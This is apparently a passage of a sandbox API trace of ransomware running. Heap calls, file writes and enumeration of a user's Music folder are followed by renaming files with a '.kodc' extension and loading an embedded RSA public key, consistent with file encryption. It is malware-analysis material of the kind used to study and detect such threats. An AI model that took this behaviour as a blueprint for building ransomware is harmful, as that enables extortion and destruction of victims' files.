0x9bb7a40 [0101.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8130 [0101.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.725] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8118 | out: hHeap=0x630000) returned 1 [0101.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8130 | out: hHeap=0x630000) returned 1 [0101.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0101.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8130 [0101.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0101.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb8118 [0101.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0101.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0101.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0101.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8130 | out: hHeap=0x630000) returned 1 [0101.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8118 | out: hHeap=0x630000) returned 1 [0101.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.726] GetCurrentThreadId () returned 0x42c [0101.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba8668 [0101.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.727] GetCurrentThreadId () returned 0x42c [0101.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.727] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8118 [0101.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0101.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8130 [0101.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8100 [0101.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8148 [0101.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0101.728] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0101.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8118 | out: hHeap=0x630000) returned 1 [0101.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8118 [0101.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0101.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0101.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0101.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0101.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0101.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0101.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8118 | out: hHeap=0x630000) returned 1 [0101.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0101.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0101.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0101.729] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8148 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8130 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8100 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80e8 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb62c8 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0101.731] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba8d90*, nNumberOfBytesToWrite=0x7757, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba8d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x7757, lpOverlapped=0x0) returned 1 [0101.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba8d90 | out: hHeap=0x630000) returned 1 [0101.731] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x775c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.731] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0101.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0101.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0101.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0101.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0101.731] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0101.731] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.731] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.731] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.731] CloseHandle (hObject=0x5cc) returned 1 [0101.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0101.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0101.733] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\5YAPOd5GhH.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\5yapod5ghh.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\5YAPOd5GhH.mp3.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\5yapod5ghh.mp3.kodc")) returned 1 [0101.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0101.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.734] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0101.735] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6438620, ftCreationTime.dwHighDateTime=0x1d5b9b9, ftLastAccessTime.dwLowDateTime=0xcfec32e0, ftLastAccessTime.dwHighDateTime=0x1d5bd0f, ftLastWriteTime.dwLowDateTime=0xcfec32e0, ftLastWriteTime.dwHighDateTime=0x1d5bd0f, nFileSizeHigh=0x0, nFileSizeLow=0x29eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6-Y7 L9pq1hTh36.m4a", cAlternateFileName="6-Y7L9~1.M4A")) returned 1 [0101.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0101.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.735] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\6-Y7 L9pq1hTh36.m4a") returned=".m4a" [0101.735] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\6-Y7 L9pq1hTh36.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\6-y7 l9pq1hth36.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.735] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=10731) returned 1 [0101.735] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.738] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x29c5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.738] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.739] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.739] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x29eb, lpOverlapped=0x0) returned 1 [0101.739] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.740] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.740] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.740] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.741] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.741] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.741] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.741] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.741] GetLastError () returned 0x0 [0101.741] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.741] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.741] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.741] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.741] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x29f0) returned 